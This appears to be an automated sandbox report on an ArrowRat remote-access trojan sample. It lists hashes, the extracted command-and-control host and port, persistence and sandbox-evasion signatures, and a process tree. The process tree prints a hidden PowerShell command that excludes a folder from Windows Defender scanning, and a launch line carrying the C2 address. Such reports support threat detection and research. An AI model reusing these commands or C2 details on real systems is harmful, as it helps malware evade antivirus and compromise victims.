Analysis

  • max time kernel
    69s
  • max time network
    89s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    02-11-2024 17:54

General

  • Target

    Client.exe

  • Size

    158KB

  • MD5

    3301ae650283538d07ce86b24ee3fe9b

  • SHA1

    6a7a80c7094b14c4c905ad48f0308b5b7bd49f42

  • SHA256

    2546c02930cc08af5cff35a94d0501f8c0fecb64f1f215c03da6f0b58c1dce40

  • SHA512

    f844169694e0390addd8e889c6d3c6df3d8ac815caec5cef329eac01b90cda647b772192facfdf7487b131e7054d04ee104ba849e1bbdd453b5357d203e0fba7

  • SSDEEP

    3072:wbz8H+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPHdO8Y:wbz8e0ODhTEPgnjuIJzo+PPcfPHQ8

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

options-printing.gl.at.ply.gg:4449

Mutex

KzvKtMMlK

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

  • Arrowrat family
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 25 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1948
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Boot or Logon Autostart Execution: Active Setup
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:4008
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client options-printing.gl.at.ply.gg 4449 KzvKtMMlK
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1132
    • C:\Windows\System32\ComputerDefaults.exe
      "C:\Windows\System32\ComputerDefaults.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:544
      • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
        "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Pan\dora'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4668
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:3352
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Checks SCSI registry key(s)
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:576
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4936

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{10972f05-f95c-4746-ba14-8a33c1deaa4d}\Apps.ft

    Filesize

    41KB

    MD5

    d2d9e402f296b901d488b4872affd70b

    SHA1

    35462f5612344dc8e56666a22f98afa45674ce11

    SHA256

    f515a0161ad0817d2a6745b2f4852f5a8e9f2c75825dbb535f0dcdfcfcd6da19

    SHA512

    72f4b7a548f2462fc82ac60c58c7f3eacb394c5b35af1c27f0bf2535942bf151683088af9d0876e95a419ebb213f131f2427adc55896a0463fd7f826e30d509a

  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{10972f05-f95c-4746-ba14-8a33c1deaa4d}\Apps.index

    Filesize

    1.0MB

    MD5

    c20bd2545b7eba40a1755fa980853f63

    SHA1

    96966e973bbdf53ad4e0213f85aaf4c396b183af

    SHA256

    d926a60e9cbb28e16da0dd2a12617bc17a9a20e959ff4d380b49f29071b5a59f

    SHA512

    e7745e6d91f4e2ad50a0664e1bc08249941acea8b8d8938977d82f0c856fc14143895ae16520034c8e4ea22fe62d79671990b2514e0dbe14d4b6aa1a54b83cd4

  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133750437133918604.txt

    Filesize

    82KB

    MD5

    e7e762d193a0f061e1d1df38d975cffe

    SHA1

    cea405e668fb9c66b30cb345a4c89a9a7eb00ab6

    SHA256

    d399f7483e399588185b9c767293a7c87c3ed2447f59582b83ac3021cd9fadb7

    SHA512

    9b42ad3d1ae8cad95b1253e8f8e6088bf687e0bf0cb48f793e03f5950d36cdd139e89ceb06ebcf8ea17e2c25f5bafbf75198c9ab0bc9bef4c118f1b49585406f

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_omf5der0.ziq.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/576-30-0x00000224D0380000-0x00000224D0381000-memory.dmp

    Filesize

    4KB

  • memory/576-31-0x00000224D0380000-0x00000224D0381000-memory.dmp

    Filesize

    4KB

  • memory/576-36-0x00000224D0380000-0x00000224D0381000-memory.dmp

    Filesize

    4KB

  • memory/576-32-0x00000224D0380000-0x00000224D0381000-memory.dmp

    Filesize

    4KB

  • memory/576-33-0x00000224D0380000-0x00000224D0381000-memory.dmp

    Filesize

    4KB

  • memory/576-34-0x00000224D0380000-0x00000224D0381000-memory.dmp

    Filesize

    4KB

  • memory/576-35-0x00000224D0380000-0x00000224D0381000-memory.dmp

    Filesize

    4KB

  • memory/576-26-0x00000224D0380000-0x00000224D0381000-memory.dmp

    Filesize

    4KB

  • memory/576-25-0x00000224D0380000-0x00000224D0381000-memory.dmp

    Filesize

    4KB

  • memory/576-24-0x00000224D0380000-0x00000224D0381000-memory.dmp

    Filesize

    4KB

  • memory/1132-19-0x0000000005F70000-0x0000000006516000-memory.dmp

    Filesize

    5.6MB

  • memory/1132-5-0x0000000005800000-0x000000000589C000-memory.dmp

    Filesize

    624KB

  • memory/1132-20-0x0000000006520000-0x0000000006586000-memory.dmp

    Filesize

    408KB

  • memory/1132-2-0x0000000000400000-0x0000000000418000-memory.dmp

    Filesize

    96KB

  • memory/1132-4-0x0000000005680000-0x0000000005712000-memory.dmp

    Filesize

    584KB

  • memory/1132-21-0x00000000067E0000-0x0000000006830000-memory.dmp

    Filesize

    320KB

  • memory/1948-6-0x00007FF973040000-0x00007FF973B02000-memory.dmp

    Filesize

    10.8MB

  • memory/1948-157-0x00007FF973043000-0x00007FF973045000-memory.dmp

    Filesize

    8KB

  • memory/1948-1-0x000001D3C86F0000-0x000001D3C871E000-memory.dmp

    Filesize

    184KB

  • memory/1948-0-0x00007FF973043000-0x00007FF973045000-memory.dmp

    Filesize

    8KB

  • memory/1948-184-0x00007FF973040000-0x00007FF973B02000-memory.dmp

    Filesize

    10.8MB

  • memory/4008-41-0x0000000002EE0000-0x0000000002EE1000-memory.dmp

    Filesize

    4KB

  • memory/4668-18-0x00000129F65B0000-0x00000129F65D2000-memory.dmp

    Filesize

    136KB

  • memory/4936-38-0x000001CC59A20000-0x000001CC59B20000-memory.dmp

    Filesize

    1024KB

  • memory/4936-61-0x000001D45CC20000-0x000001D45CC40000-memory.dmp

    Filesize

    128KB

  • memory/4936-72-0x000001D45CC40000-0x000001D45CC60000-memory.dmp

    Filesize

    128KB

  • memory/4936-71-0x000001D45CC60000-0x000001D45CC80000-memory.dmp

    Filesize

    128KB

  • memory/4936-86-0x000001D470440000-0x000001D470540000-memory.dmp

    Filesize

    1024KB